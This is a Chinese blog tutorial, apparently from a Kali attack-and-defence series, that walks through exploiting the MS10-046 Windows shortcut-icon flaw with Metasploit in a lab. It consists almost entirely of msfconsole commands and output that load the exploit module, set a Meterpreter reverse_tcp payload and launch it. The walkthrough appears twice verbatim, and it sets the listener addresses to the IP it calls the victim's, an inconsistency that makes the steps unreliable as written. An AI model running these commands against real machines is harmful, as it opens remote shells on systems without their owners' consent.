kali攻防第11章 攻击实例讲解-ms10_046快捷方式图标漏洞
2015-12-18 11:20
274 查看
攻击实例讲解-ms10_046快捷方式图标漏洞
准备工具
1、kali系统 IP:10.10.10.131
2、受害者机子 IP:10.10.10.129
3、使用工具 msfconsole
步骤:
1、进入控制台
root@kali:~# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.5-2015103001 ]
+ -- --=[ 1500 exploits - 864 auxiliary - 251 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
2、载入windows模块中的漏洞图标工具
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) >
3、需要配置的参数
msf exploit(ms10_046_shortcut_icon_dllloader) > show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 10.10.10.129
SRVHOST => 10.10.10.129
4、返回信息
msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > show options ---查看配置信息
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 10.10.10.129 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 10.10.10.129
LHOST => 10.10.10.129
5、执行攻击
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
准备工具
1、kali系统 IP:10.10.10.131
2、受害者机子 IP:10.10.10.129
3、使用工具 msfconsole
步骤:
1、进入控制台
root@kali:~# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.5-2015103001 ]
+ -- --=[ 1500 exploits - 864 auxiliary - 251 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
2、载入windows模块中的漏洞图标工具
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) >
3、需要配置的参数
msf exploit(ms10_046_shortcut_icon_dllloader) > show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 10.10.10.129
SRVHOST => 10.10.10.129
4、返回信息
msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > show options ---查看配置信息
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 10.10.10.129 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 10.10.10.129
LHOST => 10.10.10.129
5、执行攻击
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
相关文章推荐
- linux 文件分割
- 学习salt的源码2-run_job
- /etc/group /etc/gshadow 各段含义 增加和删除用户组
- java学习笔记-03 (数组篇)
- 在表维护生成器中添加F4及自动带出描述
- OC-057.copy和MutableCopy的使用
- ERROR: ORA-01033: ORACLE initialization or shutdown in progress
- cookies的使用
- UICollectionView 运用
- html居中的元素带有float属性
- 《R实战》读书笔记三
- Android ViewDragHelper完全解析 自定义ViewGroup神器
- 二维数组根据某个字段排序
- linux下一对多socket服务器端多线程泄露问题
- processing - MySQL example1-conntction(), query() , next() , getInt(1)
- 错误删除数据或清空数据怎样可以找回
- 大文件极速合并 RandomAccessFile
- xcode7以上找不到.dylib,一招帮你解决
- java protected访问权限小结
- [转]无需看到你的脸就能认出你——实现Beyond Frontal Faces: Improving Person Recognition Using Multiple Cues